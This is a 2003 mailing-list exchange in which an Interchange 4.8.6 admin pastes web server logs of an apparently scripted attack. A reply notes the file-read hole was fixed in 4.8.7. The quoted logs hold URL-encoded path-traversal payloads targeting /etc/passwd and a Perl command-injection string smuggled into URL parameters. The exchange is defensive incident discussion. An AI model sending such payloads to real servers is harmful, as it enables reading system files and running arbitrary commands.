[ic] Hack attempt on IC 4.8.6

Ed LaFrance edl at newmediaems.com
Sat Nov 15 09:18:07 EST 2003


At 10:35 PM 11/14/2003 -0800, you wrote:
> >From what I can tell this person was unsuccessful.  My IC and Apache 
> logs show multiple attempts to grab my passwd file by inserting many 
> ../../../../../'s in the URLs and attempts to execute arbitrary perl code 
> by manipulating URL parameters.  Here are a few lines:
>
>66.98.134.38 - - [13/Nov/2003:07:32:53 -0500] "GET 
>/hya/index.html?id=%2e%2e%2f%
>2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f
>%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2
>f%2e%2e%2fetc%2fpasswd%00 HTTP/1.0" 403 109 "-" "Mozilla/4.0 (compatible; 
>MSIE 4
>.0; Windows 95)"
>66.98.134.38 - - [13/Nov/2003:07:32:53 -0500] "GET 
>/hya/index.html?id=foo%3bfoo%
>7cperl%20%2de%20%27print%22roo%22%3bprint%22t%3a%22%27%26%26foo%00 
>HTTP/1.0" 403
>  82 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
>66.98.134.38 - - [13/Nov/2003:07:32:53 -0500] "GET /hya/index.html?id= 
>HTTP/1.0"
>  200 8162 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
>66.98.134.38 - - [13/Nov/2003:07:32:54 -0500] "GET /hya/index.html?id= 
>HTTP/1.0"
>  200 8162 "-" "Mozilla/4.0 (compatible; MSIE 4.0; Windows 95)"
>66.98.134.38 - - [13/Nov/2003:07:32:54 -0500] "GET 
>/hya/customerservice?mv_sessi
>on_id=6MZFj58R&mv_pc=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2
>e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%
>2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd%00&spg=customerservice 
>HTT
>P/1.0" 302 39 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
>66.98.134.38 - - [13/Nov/2003:07:32:54 -0500] "GET 
>/hya/customerservice?mv_sessi
>on_id=6MZFj58R&mv_pc=1&spg=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2
>f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%
>2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd%00 HTTP/1.0" 
>302 39
>"-" "Mozilla/4.0 (compatible; MSIE 4.0; Windows 95)"
>66.98.134.38 - - [13/Nov/2003:07:32:54 -0500] "GET 
>/hya/customerservice?mv_sessi
>on_id=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2
>e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%
>2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd%00&mv_pc=1&spg=customerservice 
>HTTP/1.0"
>403 109 "-" "Mozilla/4.0 (compatible; MSIE 4.0; Windows 95)"
>
>Sorry for the weird wrapping.  The log goes on and on like this.
>
>Has anyone else seen this kind of attempt?  It looks like a script judging 
>by the rapidity of the accesses.
>
>Ryan

I just grep'd the logs on a couple of servers for matching substrings and 
came up empty. I get the impression that this attempt was targeted 
specifically at interchange. There was a vulnerability in the 4.8 branch 
which could allow arbitrary file reads with a technique like this, but it 
was fixed, so if you are running 4.8.7 or higher you should be ok. If you 
are running an earlier version, I strongly recommend an upgrade.

- Ed

>

===============================================================
New Media E.M.S.              Technology Solutions for Business
11630 Fair Oaks Blvd., #250   eCommerce | Consulting | Hosting
Fair Oaks, CA  95628          edl at newmediaems.com
(916) 961-0446                http://www.newmediaems.com
(866) 519-4680 Toll-Free      (916) 961-0447 Fax
=============================================================== 



More information about the interchange-users mailing list